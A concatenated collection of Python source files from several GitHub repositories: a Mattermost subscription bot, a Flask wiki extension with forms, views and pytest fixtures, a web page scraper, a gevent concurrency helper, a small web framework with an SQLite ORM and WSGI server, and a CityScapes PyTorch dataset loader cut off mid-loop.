            self._show_help(channel_id, post_id)
        elif re.match(r'(@' + self.username + r')?\s*subscribe\s*', message):
            self._handle_subscription(sender_id, channel_id, post_id)
        elif re.match(r'(@' + self.username + r')?\s*unsubscribe\s*', message):
self._handle_unsubscription(channel_id, post_id, sender_id)
else:
self._handle_unknown_command(channel_id, post_id)
def _show_help(self, channel_id, post_id):
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.HELP_TEXT,
'root_id': post_id,
})
def _handle_subscription(self, sender_id, channel_id, post_id):
self.subscriptions.add(sender_id)
if self.debug:
print(sender_id + " subscribed.")
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.SUBSCRIBED_MESSAGE,
'root_id': post_id,
})
def _handle_unsubscription(self, channel_id, post_id, sender_id):
if sender_id in self.subscriptions:
self.subscriptions.discard(sender_id)
if self.debug:
print(sender_id + " unsubscribed.")
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.UNSUBSCRIBED_MESSAGE,
'root_id': post_id,
})
else:
self.driver.posts.create_post({
'channel_id': channel_id,
                'message': self.NOT_SUBSCRIBED_MESSAGE,
'root_id': post_id,
})
def _handle_unknown_command(self, channel_id, post_id):
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.UNKNOWN_COMMAND_TEXT,
'root_id': post_id,
})
def send_messages_to_subscribers(self, message):
for subscriber in self.subscriptions:
self._send_direct_message(subscriber, message)
def _send_direct_message(self, user_id, message, root_id=None):
res = self.driver.channels.create_direct_message_channel([self.userid, user_id])
channel_id = res['id']
post_options = {
'channel_id': channel_id,
'message': message,
}
if root_id:
post_options['root_id'] = root_id
self.driver.posts.create_post(post_options)
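# Illustrative usage sketch (not part of the original module): wiring the bot up.
# The credentials and the broadcast message below are hypothetical placeholders.
if __name__ == '__main__':
    import time
    bot = SubscriptionBot(username='bot', password='<PASSWORD>', debug=True)
    bot.start_listening()  # websocket listener runs in a daemon thread
    while True:
        # e.g. a periodic reminder pushed to everyone who sent 'subscribe'
        bot.send_messages_to_subscribers("Time to move - take a five minute walk!")
        time.sleep(3600)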
``` |
{
"source": "1xch/fliki",
"score": 2
} |
#### File: fliki/flask_fliki/fliki.py
```python
from werkzeug.local import LocalProxy
from .wiki import Wiki
from .views import create_blueprint
from .util import get_config, url_for_wiki, _wiki
_default_config = {
'BLUEPRINT_NAME': 'wiki',
'URL_PREFIX': '/wiki',
'SUBDOMAIN': None,
'FLASH_MESSAGES': True,
'EDITABLE': True,
'SECURABLE': True,
'MARKUP_PROCESSOR': None,
'CONTENT_DIR': 'fliki-content',
'DISPLAY_VIEW': 'wiki/display.html',
'EDIT_VIEW': 'wiki/edit.html'
}
_default_messages = {
'MOVE_PAGE_SUCCESS': ('{old_page} was moved to {new_page}', 'success'),
'MOVE_PAGE_FAIL': ('Unable to move {old_page}', 'error'),
'EDIT_PAGE_SUCCESS': ('{page} successfully edited', 'success'),
'EDIT_PAGE_FAIL': ('Unable to edit {page}', 'error'),
    'DELETE_PAGE_SUCCESS': ('{page} successfully deleted', 'success'),
'DELETE_PAGE_FAIL': ('Unable to delete {page}', 'error'),
}
def _context_processor(wiki):
ctx_prcs = {}
ctx_prcs.update({'url_for_wiki': url_for_wiki, 'wiki': wiki})
return ctx_prcs
def _get_wiki(app, datastore, **kwargs):
for key, value in get_config(app).items():
kwargs[key.lower()] = value
kwargs.update(dict(app=app, datastore=datastore))
wiki = Wiki(**kwargs)
return wiki
class Fliki(object):
def __init__(self, app=None, datastore=None, **kwargs):
self.app = app
self.datastore = datastore
if self.app is not None and self.datastore is not None:
self._wiki = self.init_app(self.app, self.datastore, **kwargs)
def init_app(self, app, datastore, register_blueprint=True, **kwargs):
for key, value in _default_config.items():
app.config.setdefault('WIKI_' + key, value)
for key, value in _default_messages.items():
app.config.setdefault('WIKI_MSG_' + key, value)
wiki = _get_wiki(app, datastore, **kwargs)
if register_blueprint:
app.register_blueprint(create_blueprint(wiki, __name__))
app.extensions['fliki'] = wiki
self.register_context_processors(app, _context_processor(wiki))
return wiki
def register_context_processors(self, app, context_processors):
app.jinja_env.globals.update(context_processors)
def __getattr__(self, name):
return getattr(self._wiki, name, None)
```
#### File: fliki/flask_fliki/forms.py
```python
from flask.ext.wtf import Form
from wtforms import (HiddenField, TextField, TextAreaField, SubmitField)
from .util import clean_url
class WikiForm(Form):
def __init__(self, **kwargs):
super(WikiForm, self).__init__(**kwargs)
class EditorForm(WikiForm):
pagekey = HiddenField('')
edit_content = TextAreaField('')
submit = SubmitField('create or save page')
def __init__(self, **kwargs):
super(EditorForm, self).__init__(**kwargs)
self.key = clean_url(kwargs.get('url', None))
self.pagekey.data = self.key
class MoveForm(WikiForm):
oldkey = HiddenField('')
newkey = TextField('')
submit = SubmitField('move page')
def __init__(self, **kwargs):
super(MoveForm, self).__init__(**kwargs)
self.oldkey.data = kwargs.get('old', None)
self.newkey.data = kwargs.get('new', None)
class DeleteForm(WikiForm):
delete = HiddenField('')
submit = SubmitField('delete page')
def __init__(self, **kwargs):
super(DeleteForm, self).__init__(**kwargs)
self.delete.data = kwargs.get('delete', None)
```
#### File: fliki/flask_fliki/views.py
```python
from flask import (current_app, redirect, request, render_template,
Blueprint, url_for)
from .util import config_value, _wiki, flash_next
from .forms import EditorForm, MoveForm, DeleteForm
def index():
page = _wiki.get('index')
return render_template(_wiki.display_view, page=page)
def display(url):
page = _wiki.get(url)
if page:
return render_template(_wiki.display_view, page=page)
return redirect(url_for('.wiki_edit', url=url))
def preview(url):
page = _wiki.get(url)
if page:
return page.html
def edit(url):
page = _wiki.get(url)
if page:
first = False
forms = {'edit_form': EditorForm(url=url, edit_content=page.raw),
'move_form': MoveForm(old=url),
'delete_form': DeleteForm(delete=url)}
else:
        first = True
        forms = {'edit_form': EditorForm(url=url)}
return render_template(_wiki.edit_view, first=first, forms=forms, page=page)
def save():
r = request.form
form = EditorForm(url=r['pagekey'], edit_content=r['edit_content'])
page = form.pagekey.data
if form.validate_on_submit():
if _wiki.put(page, form.edit_content.data):
flash_next('EDIT_PAGE_SUCCESS', page=page)
else:
flash_next('EDIT_PAGE_FAIL', page=page)
return redirect(url_for('.wiki_display', url=page))
def move():
r = request.form
form = MoveForm(old=r['oldkey'], new=r['newkey'])
old = form.oldkey.data
new = form.newkey.data
if form.validate_on_submit():
if _wiki.move(old, new):
flash_next('MOVE_PAGE_SUCCESS', old_page=old, new_page=new)
return redirect(url_for('.wiki_display', url=new))
flash_next('MOVE_PAGE_FAIL', old_page=old)
return redirect(url_for('.wiki_display', url=old))
def delete():
r = request.form
form = DeleteForm(delete=r['delete'])
page = form.delete.data
if form.validate_on_submit():
if _wiki.delete(page):
url='index'
flash_next('DELETE_PAGE_SUCCESS', page=page)
else:
url = form.delete.data
flash_next('DELETE_PAGE_FAIL', page=page)
return redirect(url_for('.wiki_display', url=url))
def create_blueprint(wiki, import_name):
bp = Blueprint(wiki.blueprint_name,
import_name,
url_prefix=wiki.url_prefix,
subdomain=wiki.subdomain,
template_folder='templates')
bp.route('/',
endpoint='wiki_index',
methods=['GET'])(index)
bp.route('/<path:url>/',
endpoint='wiki_display',
methods=['GET'])(display)
if wiki.editable:
bp.route('/<path:url>/preview',
endpoint='wiki_preview',
methods=['GET'])(preview)
bp.route('/<path:url>/edit',
endpoint='wiki_edit',
methods=['GET'])(edit)
bp.route('/move',
endpoint='wiki_move',
methods=['POST'])(move)
bp.route('/save',
endpoint='wiki_save',
methods=['POST'])(save)
bp.route('/delete',
endpoint='wiki_delete',
methods=['POST'])(delete)
return bp
```
#### File: fliki/tests/conftest.py
```python
import pytest
from flask import Flask
from flask.ext.fliki import Fliki
import datastore.filesystem
import shutil
def remove_data():
shutil.rmtree('/tmp/fliki-content')
@pytest.fixture
def app(request):
app = Flask(__name__)
app.config['TESTING'] = True
app.config['WTF_CSRF_ENABLED'] = False
app.config['SECRET_KEY'] = 'secret_key'
app.config['WIKI_URL_PREFIX'] = '/test'
Fliki(app, datastore=datastore.filesystem.FileSystemDatastore('/tmp/fliki-content'))
app.extensions['fliki'].put('random_page', "A random page")
request.addfinalizer(remove_data)
return app
@pytest.fixture
def client(app):
return app.test_client()
``` |
{
"source": "1x-eng/ext-a-cy",
"score": 3
} |
#### File: ext-a-cy/core/scraper.py
```python
from bs4 import BeautifulSoup
import os
import requests
__author__='<NAME>'
# 30 June 2019.
# <EMAIL>
# Scrape contents of a loaded webpage into a text file and store into a text file within sink.
class ScrapePage:
def __init__(self, page_source, sink_file_name):
super(ScrapePage, self).__init__()
self.page_source = page_source
self.sink_file_name = sink_file_name
@staticmethod
def __scrape_body(page_source):
soup = BeautifulSoup(page_source, features='html.parser')
body = soup.find('body')
the_contents_of_body_without_body_tags = body.findChildren()
return the_contents_of_body_without_body_tags
def __scrape_iframe(self, iframe_id):
try:
session = requests.Session()
soup = BeautifulSoup(self.page_source, features='html.parser')
iframe_src = soup.select_one('#{}'.format(iframe_id)).attrs['src']
iframe_contents = session.get(f"https:{iframe_src}")
iframe_soup = BeautifulSoup(iframe_contents.content, 'html.parser')
return iframe_soup
except Exception as e:
print('Unable to scrape contents of iframe: {}. Stack trace to follow.'.format(iframe_id))
print(str(e))
def extractor(self):
try:
# create a sink if not already existing
os.makedirs('{}/../sink'.format(os.path.dirname(__file__)), exist_ok=True)
# Extract page contents using Soup.
            # .txt to visualize differences.
with open('{}/../sink/{}.txt'.format(os.path.dirname(__file__), self.sink_file_name), "a") as f:
print(self.__scrape_body(self.page_source), file=f)
except Exception as e:
print('Failed to scrape contents into {} file. Stack trace to follow.'.format(self.sink_file_name))
print(str(e))
def iframe_extractor(self, iframe_id):
try:
# create a sink if not already existing
os.makedirs('{}/../sink'.format(os.path.dirname(__file__)), exist_ok=True)
# Extract page contents using Soup.
            # .txt to visualize differences.
with open('{}/../sink/{}.txt'.format(os.path.dirname(__file__), self.sink_file_name), "a") as f:
print(self.__scrape_iframe(iframe_id), file=f)
except Exception as e:
print('Failed to scrape iframe contents into {} file. Stack trace to follow.'.format(self.sink_file_name))
print(str(e))
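# Illustrative usage sketch (not part of the original module). The page source would
# normally come from a loaded webpage (e.g. selenium's driver.page_source); the file
# name and iframe id below are hypothetical placeholders.
if __name__ == '__main__':
    with open('sample_page.html', 'r', encoding='utf-8') as fh:
        page_source = fh.read()
    scraper = ScrapePage(page_source, sink_file_name='sample_page')
    scraper.extractor()                      # dumps the <body> contents to sink/sample_page.txt
    scraper.iframe_extractor('main-iframe')  # appends the contents of iframe #main-iframe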
``` |
{
"source": "1x-eng/PROTON",
"score": 2
} |
#### File: nucleus/generics/parallel_programming.py
```python
from gevent import monkey
monkey.patch_socket()
monkey.patch_ssl()
# ensure monkey patching for gevents to work their charm.
# remember - monkey patching is a necessary evil here.
import gevent
import time
__author__ = "<NAME>, <EMAIL>"
__copyright__ = "Copyright (C) 2018 <NAME> | http://www.apricity.co.in"
__license__ = "BSD 3-Clause License"
__version__ = "1.0"
class Parallel_Programming:
def __init__(self):
super(Parallel_Programming, self).__init__()
def __generate_multiple_threads(self, associated_function, *args):
"""
Parallel Programming is Tricky. Used well, reaps many benefits; if otherwise, it will be a nightmare.
Multiple threading is advised for IO heavy ops (Like making multiple API calls concurrently). If what you want
        is not IO heavy but CPU heavy, consider multi processing instead. Multi Threading is not best suited for CPU
intense operations.
:param associated_function: function that the greenlet is supposed to execute.
:param args: Dynamic argument list. Will resolve to a tuple.
:return: a greenlet.
"""
return gevent.spawn(associated_function, *args)
def __execute_multiple_threads(self, greenlets_pool, time_since_pool = None):
"""
:param greenlets_pool: a list of greenlets
:param time_since_pool: time.time() value. This essentially must be the time when pool was generated by
generate_multiple_threads
:return: results in dictionary suggesting time of execution. StartTime, endTime-StartTime
"""
start_time = time.time()
gevent.joinall(greenlets_pool)
end_time = time.time()
results = list(map(lambda g: g.value, greenlets_pool))
return {
'execution_time': end_time - start_time,
'execution_time_since_pool_gen': None if time_since_pool is None else end_time - time_since_pool,
'thread_pool_results': results
}
#########################################################################################################
# Multi Threading Wrapper. [PS: Use Multi Threading only on IO heavy ops; Not CPU intense]
#########################################################################################################
def concurrency_wrapper(self, type, target_function, *args):
"""
Multi-threading functionality available should this MIC stack need it.
self.generate_multiple_threads: Method to generate multiple threads and create a thread pool.
self.execute_multiple_threads: Method to concurrently execute threads in a threadpool.
:param type: Valid Options: 'http', 'non-http',
:param target_function: Target function that threads should execute (This function should be in scope)
:param args: Arguments expected by target function. If type=='http', *args[0] must be a list of URLS.
:return: Results respective to type of operation specified.
"""
from configuration import ProtonConfig
from nucleus.generics.log_utilities import LogUtilities
logger = LogUtilities().get_logger(log_file_name='parallel_programming_logs',
log_file_path='{}/trace/parallel_programming_logs.log'.format(
ProtonConfig.ROOT_DIR))
def __http_calls_resolver(target_function, args):
"""
:param target_function: Target function that threads should execute (This function should be in scope)
:param args:[List] Arguments expected by target function. For HTTP Calls, args[0] = A list of urls to
perform HTTP Operation.
:return:[List] Thread Pool Results
"""
# TODO: Validate input parameters to contain expected; fail gracefully if not.
try:
_args = list(args)
urls = _args[0]
_args.pop(0)
# Step 1: Create number of threads required.
threads_pool = list(map(lambda url: self.__generate_multiple_threads(target_function, url, _args),
urls))
time_after_pool = time.time()
logger.info('[Parallel Programming] - Threads pool created with {} threads to resolve {} '
'method concurrently'.format(len(urls), target_function))
# Step 2: Execute threads concurrently.
thread_pool_results = self.__execute_multiple_threads(threads_pool, time_after_pool)
logger.info(
'[Parallel Programming] - {} threads executed concurrently. Operation was completed in '
'{} seconds and took {} seconds since thread pool was '
'spawned.'.format(len(urls), thread_pool_results['execution_time'],
thread_pool_results['execution_time_since_pool_gen']))
return thread_pool_results
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing HTTP call resolver. Stack trace to follow')
logger.exception(str(e))
def __non_http_resolver(target_function, args):
"""
:param target_function: Target function that threads should execute (This function should be in scope)
:param args:[List] Arguments expected by target function.
:return:[List] Thread Pool Results.
"""
try:
# Step 1: Create number of threads required.
threads_pool = list(map(lambda arg: self.__generate_multiple_threads(target_function, arg), args))
time_after_pool = time.time()
logger.info('[Parallel Programming] - Threads pool created with {} threads to resolve {} '
'method concurrently'.format(len(args), target_function))
# Step 2: Execute threads concurrently.
thread_pool_results = self.__execute_multiple_threads(threads_pool, time_after_pool)
logger.info(
'[Parallel Programming] - {} threads executed concurrently. Operation was completed in '
'{} seconds and took {} seconds since thread pool was '
'spawned.'.format(len(args), thread_pool_results['execution_time'],
thread_pool_results['execution_time_since_pool_gen']))
return thread_pool_results
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing Non-HTTP resolver. Stack trace to follow')
logger.exception(str(e))
def __async_resolver(target_function, args):
"""
Use this function when you want non-blocking sequence of execution.
:param target_function: Target function that threads should execute (This function should be in scope)
:param args: [Tuple] Arguments expected by target function.
:return: Void
"""
try:
g = gevent.spawn(target_function, args)
gevent.sleep(0) # This is required to kickstart gevent co-routines since there will be no join.
logger.info('[Parallel Programming] Async resolver {} invoked to execute function - '
'{} and args - {}'.format(g, target_function, args))
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing async resolver. Stack trace to follow')
logger.exception(str(e))
__map_type = {'http': __http_calls_resolver, 'non-http': __non_http_resolver, 'async': __async_resolver}
return __map_type[type](target_function, args)
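# Illustrative usage sketch (not part of the original module): driving the 'http'
# resolver of concurrency_wrapper. The URLs are hypothetical placeholders and the
# `requests` library is assumed to be available; for type='http', args[0] must be
# the list of URLs and any remaining args are passed through to the target function.
def _example_fetch(url, extra_args):
    import requests
    return url, requests.get(url, timeout=10).status_code
def _example_http_pool():
    urls = ['https://example.com/a', 'https://example.com/b', 'https://example.com/c']
    pool = Parallel_Programming()
    results = pool.concurrency_wrapper('http', _example_fetch, urls)
    # results carries timing info plus one entry per URL in 'thread_pool_results'
    return results['thread_pool_results'], results['execution_time']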
```
#### File: test/unit/test_log_utilities.py
```python
from configuration import ProtonConfig
from nucleus.generics.log_utilities import LogUtilities
from unittest import TestCase
__author__ = "<NAME>, <EMAIL>"
__copyright__ = "Copyright (C) 2018 <NAME>"
__license__ = "BSD 3-Clause License"
__version__ = "1.0"
class TestLogUtilities(TestCase):
log_utilities_object = LogUtilities()
def test_log_utilities(self):
assert isinstance(self.log_utilities_object, LogUtilities)
def test_logger(self):
return_logger = self.log_utilities_object.get_logger(log_file_name='test_log_utillities_logs',
log_file_path='{}/trace/test_log_utillities_logs.log'.format(
ProtonConfig.ROOT_DIR))
print(str(return_logger))
assert str(type(return_logger)) == "<class 'logging.Logger'>"
assert str(return_logger) == '<Logger test_log_utillities_logs.base (DEBUG)>'
``` |
{
"source": "1xuan/webgo",
"score": 2
} |
#### File: webgo/demo/demoapp.py
```python
import time
from datetime import datetime
from webgo.handler import get, post
from webgo.template import render
from .model import Exam
@post('/')
def form(request):
name = request.POST['name']
# Create a record
exam = Exam(name=name, time=str(datetime.now()))
# Save it to database
exam.save()
# Select all record in 'Exam' table
all_rec = Exam.objects.query()
return '<br>'.join('LOG: ' + item.name + item.time for item in all_rec)
@get('/')
def static_text(request):
return render(request, 'index.html', context={
'value': 'Login Log',
})
@get('/hello')
def hello(request):
time.sleep(1)
return 'Hello World'
```
#### File: webgo/webgo/config.py
```python
import os
import logging
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s',
)
DB_FILE = 'sqlite.db'
project = None
class ProjectParse:
def __init__(self, project_path):
self._project_path = project_path
@property
def path(self):
return self._project_path
@property
def name(self):
return os.path.basename(self._project_path)
@property
def pkg_name(self):
return self.name + '__main__'
```
#### File: webgo/webgo/orm.py
```python
import sqlite3
import logging
from collections import abc
from webgo.exceptions import FieldError
from webgo.config import DB_FILE
logger = logging.getLogger(__name__)
class MyConnection(sqlite3.Connection):
"""
Customize sql execute class on my behalf
"""
def cursor(self, *args, **kwargs):
return super().cursor(MyCursor)
class MyCursor(sqlite3.Cursor):
def execute(self, *args, **kwargs):
if len(args) == 1:
return super().execute(*args, **kwargs)
sql, values = args
values = tuple(map(lambda x: None if isinstance(x, NewId) else x, values))
return super().execute(sql, values)
class DBConnect:
""" DB connection context manager """
def __init__(self):
self.conn = sqlite3.connect(DB_FILE, factory=MyConnection)
def __enter__(self):
return self.conn
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
self.conn.commit()
elif issubclass(exc_type, sqlite3.Error):
self.conn.rollback()
logger.warning(f'The DB operation error: {exc_val}', exc_info=True)
else:
logger.warning(f'Exception: {exc_val}', exc_info=True)
self.conn.close()
return True
class NewId:
""" pseudo-id for new record """
def __bool__(self):
return False
class ModelMetaclass(type):
def __new__(mcs, name, bases, attrs):
if attrs.get('__abstract__'):
return type.__new__(mcs, name, bases, attrs)
mappings = {}
for k, v in attrs.items():
if isinstance(v, Field):
if k == 'pk':
raise FieldError("Can't define Field named 'pk'")
mappings[k] = v
for k in mappings.keys():
attrs.pop(k)
mappings['pk'] = Field('pk', 'INTEGER PRIMARY KEY AUTOINCREMENT')
attrs['__mappings__'] = mappings
attrs['__table__'] = name
return type.__new__(mcs, name, bases, attrs)
class RecordSet(abc.Set):
""" Create a record set for result of query
Cause of which it inherit abc.Set:
We can perform some operations come from set.
'|', '&', ... and so on
"""
def __init__(self, iterable=None, model=None):
        self._set = set(iterable) if iterable else set()
self.model = model
def __get__(self, inst, class_):
return self.__class__(model=class_)
def query(self, **kwargs):
""" Return a recordset including all specific records of table """
if len(kwargs) > 1:
raise KeyError('support search by one key word only')
if not kwargs:
kwargs[1] = 1
kw = list(kwargs.keys())[0]
cols = list(self.model.__mappings__.keys())
colstr = ','.join(cols)
with DBConnect() as conn:
rows = conn.execute(f"""
SELECT {colstr} FROM {self.model.__table__}
WHERE {kw}=?
""", (kwargs[kw], )
).fetchall()
return self.__class__(
(self.model(**dict(zip(cols, row))) for row in rows),
self.model
)
def get(self, pk):
""" Return a single record which is a instance of class """
cols = list(self.model.__mappings__.keys())
colstr = ','.join(cols)
with DBConnect() as conn:
row = conn.execute(f"""
SELECT {colstr} FROM {self.model.__table__}
WHERE pk={pk}
""").fetchone()
return self.model(**dict(zip(cols, row)))
def _row(self):
pass
def __contains__(self, value):
return value in self._set
def __iter__(self):
return iter(self._set)
def __len__(self):
return len(self._set)
def __str__(self):
        return '<%s RecordSet (%s)>' % (self.model.__name__, ','.join(map(lambda x: str(x.pk), self._set)))
class Model(metaclass=ModelMetaclass):
""" Base class of all models mapping tables
Define all abstract methods interact with DB
"""
__abstract__ = True
objects = RecordSet()
def __init__(self, **kwargs):
for key, value in kwargs.items():
if key not in self.__mappings__:
raise AttributeError(f'{key} does not exist')
if not isinstance(value, self.__mappings__[key]._py_type):
                raise TypeError(f'{key} has the wrong type')
pk = NewId()
if 'pk' in kwargs:
pk = kwargs.pop('pk')
kwargs['_pk'] = pk
self.__dict__.update(**kwargs)
@property
def pk(self):
return self._pk
@classmethod
def create_table(cls):
""" Create a table in database
It will create all tables through all base class's subclass
"""
with DBConnect() as conn:
get_tables = f"""
SELECT NAME
FROM sqlite_master
WHERE type='table'
"""
tables = set(
map(lambda x: x[0], conn.execute(get_tables).fetchall())
)
for class_ in cls.__subclasses__():
if class_.__name__ in tables:
continue
cols = ','.join([f'{c.col_name} {c.col_type}'
for c in class_.__mappings__.values()])
conn.execute(f"CREATE TABLE {class_.__table__} ({cols})")
logger.info(f'Table {class_.__table__} created')
def _create(self):
""" Create record by instance of class """
cols = []
args = []
params = []
for k, v in self.__mappings__.items():
cols.append(v.col_name)
args.append(getattr(self, k))
params.append('?')
cols_str = ','.join(cols)
params_str = ','.join(params)
sql = f"""
INSERT INTO { self.__table__ } ({ cols_str })
VALUES ({ params_str })
"""
with DBConnect() as conn:
conn.execute(sql, tuple(args))
pk = conn.execute(f"""
select pk from {self.__table__} order by pk desc
""").fetchone()
self._pk = pk[0]
def delete(self):
sql = f"""
DELETE FROM { self.__table__ }
WHERE pk={self.pk}
"""
with DBConnect() as conn:
conn.execute(sql)
def save(self):
pk_value = self.pk
if pk_value:
self._update()
else:
self._create()
def _update(self):
cols = []
args = []
params = []
for k, v in self.__mappings__.items():
cols.append(v.col_name)
args.append(getattr(self, k))
params.append('?')
cols_str = ','.join([col+'=?' for col in cols])
sql = f"""
update { self.__table__ }
set { cols_str }
where pk={self.pk}
"""
with DBConnect() as conn:
conn.execute(sql, tuple(args))
def __getattr__(self, key):
if key not in self.__mappings__:
raise AttributeError(f"There's no attribute { key }")
def __setattr__(self, key, value):
super().__setattr__(key, value)
def __eq__(self, other):
return hash(self) == hash(other) and self.__dict__ == other.__dict__
def __hash__(self):
return self.pk
def __str__(self):
return '<%s:%s>' % ('Model', self.__class__.__name__)
def __repr__(self):
return '<%s:%s # pk=%s>' % ('Model', self.__class__.__name__, self.pk)
class Field:
""" Base class of Field class """
def __init__(self, col_name, col_type):
self.col_name = col_name
self.col_type = col_type
self._py_type = {
'TEXT': str,
'INT': int,
}.get(col_type, object)
class IntegerField(Field):
def __init__(self, col_name):
super().__init__(col_name, 'INT')
class TextField(Field):
def __init__(self, col_name):
super().__init__(col_name, 'TEXT')
class User(Model):
name = TextField('name')
age = IntegerField('age')
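# Illustrative usage sketch (not part of the original module): the intended flow of
# the mini ORM above. The records created here are examples only.
def _example_orm_usage():
    Model.create_table()              # creates a table for every Model subclass
    alice = User(name='alice', age=30)
    alice.save()                      # INSERT: a pk is assigned after the insert
    alice.age = 31
    alice.save()                      # UPDATE: the record already has a pk
    same_age = User.objects.query(age=31)
    everyone = User.objects.query()
    both = same_age & everyone        # RecordSet inherits abc.Set, so '&', '|', '-' work
    return User.objects.get(alice.pk), len(both)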
```
#### File: webgo/webgo/wsgiserver.py
```python
import os
import sys
import types
import logging
import argparse
from multiprocessing.pool import ThreadPool
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
from importlib.abc import Loader, MetaPathFinder
from importlib.util import spec_from_file_location
from webgo import config
from webgo import webgoapp
from webgo.template import get_abs_path
logger = logging.getLogger(__name__)
def serving(Application=webgoapp.Application):
PROJECT_PATH = parse_command_argument()
config.project = config.ProjectParse(PROJECT_PATH)
sys.meta_path.append(WebgoMetaPathFinder())
app = Application(config.project.pkg_name)
# Reload file if file modified
app = Reload(app, config.project.path)
logger.info(f'Serving {config.project.pkg_name} ... ')
run_server(app)
def run_server(app):
make_server('', 8080, app).serve_forever()
class ThreadPoolWSGIServer(WSGIServer):
def __init__(self, workers, *args, **kwargs):
WSGIServer.__init__(self, *args, **kwargs)
self.workers = workers
self.pool = ThreadPool(self.workers)
def process_request(self, request, client_address):
self.pool.apply_async(
WSGIServer.process_request,
args=(self, request, client_address)
)
def make_server(
host,
port,
app,
handler_class=WSGIRequestHandler,
workers=8
):
    httpd = ThreadPoolWSGIServer(
workers=workers,
server_address=(host, port),
RequestHandlerClass=handler_class
)
httpd.set_app(app)
return httpd
class WebgoMetaPathFinder(MetaPathFinder):
def find_spec(self, fullname, path, target=None):
modname = config.project.pkg_name
location = os.path.join(config.project.path, '__init__.py')
if fullname == modname:
return spec_from_file_location(
name=modname,
location=location,
loader=WebgoLoader(),
submodule_search_locations=[config.project.path]
)
else:
return None
class WebgoLoader(Loader):
def create_module(self, spec):
return None
def exec_module(self, module):
with open(module.__file__) as f:
data = f.read()
exec(data, module.__dict__)
def module_repr(self, module):
        raise NotImplementedError
def parse_command_argument():
parser = argparse.ArgumentParser()
parser.add_argument('project', help='your project')
parser.add_argument('--migrate', help='migrate your model')
args = parser.parse_args()
# if args.migrate:
# The operation is somewhat funny!
# _load_module(get_abs_path(args.project))
# orm.Model.create_table(args.migrate)
# sys.exit()
return get_abs_path(args.project)
class Reload:
""" Module-reload Middleware """
def __init__(self, app, project_path):
self.app = app
self.project = project_path
self.mtime = os.path.getctime(project_path)
def __call__(self, environ, start_response):
mtime_now = os.path.getctime(self.project)
if mtime_now != self.mtime:
logger.info(f'Reloading {self.project} ... ')
self.app.__init__(config.project.pkg_name)
self.mtime = mtime_now
return self.app(environ, start_response)
``` |
{
"source": "1xyz/pytorch-fcn-ext",
"score": 2
} |
#### File: torchfcn/datasets/cityscape.py
```python
import collections
import os.path as osp
import sys
import PIL.Image
import numpy as np
import torch
from torch.utils import data
from .transforms import ImageTransformType, FlipType, apply_transform
class CityScape(data.Dataset):
class_names = np.array([
'ego vehicle',
'rectification border',
'out of roi',
'static',
'dynamic',
'ground',
'road',
'sidewalk',
'parking',
'rail track',
'building',
'wall',
'fence',
'guard rail',
'bridge',
'tunnel',
'pole',
'polegroup',
'traffic light',
'traffic sign',
'vegetation',
'terrain',
'sky',
'person',
'rider',
'car',
'truck',
'bus',
'caravan',
'trailer',
'train',
'motorcycle',
'bicycle',
'license plate'
])
mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])
train_flip_types = [FlipType.Unknown, FlipType.Vertical, FlipType.Horizontal]
train_transform_types = [
ImageTransformType.CenterCrop,
ImageTransformType.BottomRightCrop,
ImageTransformType.BottomLeftCrop,
ImageTransformType.TopRightCrop,
ImageTransformType.TopLeftCrop,
ImageTransformType.Resize
]
val_flip_types = [FlipType.Unknown]
val_transform_types = [
ImageTransformType.Resize
]
final_h = 256
final_w = 512
def __init__(self, root, split='train', transform=False):
self.root = root
self.split = split
self._transform = transform
dataset_dir = osp.join(self.root, 'CityScapes/CityScapes')
self.files = collections.defaultdict(list)
for split in ['train', 'val']:
imgsets_file = osp.join(
dataset_dir, 'CityScapes_%s.txt' % split)
for did in open(imgsets_file):
did = did.strip()
city = did.partition('_')[0]
img_file = osp.join(
dataset_dir,
"{0}/{1}/{2}/{3}_{0}.png".format("leftImg8bit", split, city, did))
lbl_file = osp.join(
dataset_dir,
"{0}/{1}/{2}/{3}_{0}_labelIds.png".format("gtFine", split, city, did))
if split == 'train':
for flip_type in self.train_flip_types:
for transform_type in self.train_transform_types:
self.files[split].append({
'img': img_file,
'lbl': lbl_file,
'flip_type': flip_type,
'transform_type': transform_type
})
else:
for flip_type in self.val_flip_types:
for transform_type in self.val_transform_types:
self.files[split].append({
'img': img_file,
'lbl': lbl_file,
'flip_type': flip_type,
'transform_type': transform_type
})
def __len__(self):
return len(self.files[self.split])
def __getitem__(self, index):
data_file = self.files[self.split][index]
img_file = data_file['img']
lbl_file = data_file['lbl']
flip_type = data_file['flip_type']
transform_type = data_file['transform_type']
with PIL.Image.open(img_file) as img, PIL.Image.open(lbl_file) as lbl:
try:
new_img, new_lbl = apply_transform(img, lbl, transform_type, flip_type, self.final_h, self.final_w)
new_img = np.array(new_img, dtype=np.uint8)
new_lbl = np.array(new_lbl, dtype=np.int32)
new_lbl[new_lbl == 255] = -1
            except Exception:
                print("Unexpected error:", sys.exc_info()[0])
                print(f"Current index {index} img_file: {img_file}")
                print(f"Current index {index} lbl_file: {lbl_file}")
raise
if self._transform:
return self.transform(new_img, new_lbl)
else:
return new_img, new_lbl
def transform(self, img, lbl):
img = img[:, :, ::-1] # RGB -> BGR
img = img.astype(np.float64)
img -= self.mean_bgr
img = img.transpose(2, 0, 1)
img = torch.from_numpy(img).float()
lbl = torch.from_numpy(lbl).long()
return img, lbl
def untransform(self, img, lbl):
img = img.numpy()
img = img.transpose(1, 2, 0)
img += self.mean_bgr
img = img.astype(np.uint8)
img = img[:, :, ::-1]
lbl = lbl.numpy()
return img, lbl
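# Illustrative usage sketch (not part of the original module): consuming the dataset.
# The dataset root below is a hypothetical path that must contain the
# CityScapes/CityScapes directory with the split files expected by __init__.
def _example_loader(root='/datasets', split='train', batch_size=4):
    dataset = CityScape(root, split=split, transform=True)
    loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=(split == 'train'))
    for imgs, lbls in loader:
        # imgs: float tensor (N, 3, 256, 512), BGR and mean-subtracted by transform()
        # lbls: long tensor (N, 256, 512) with -1 marking ignored pixels
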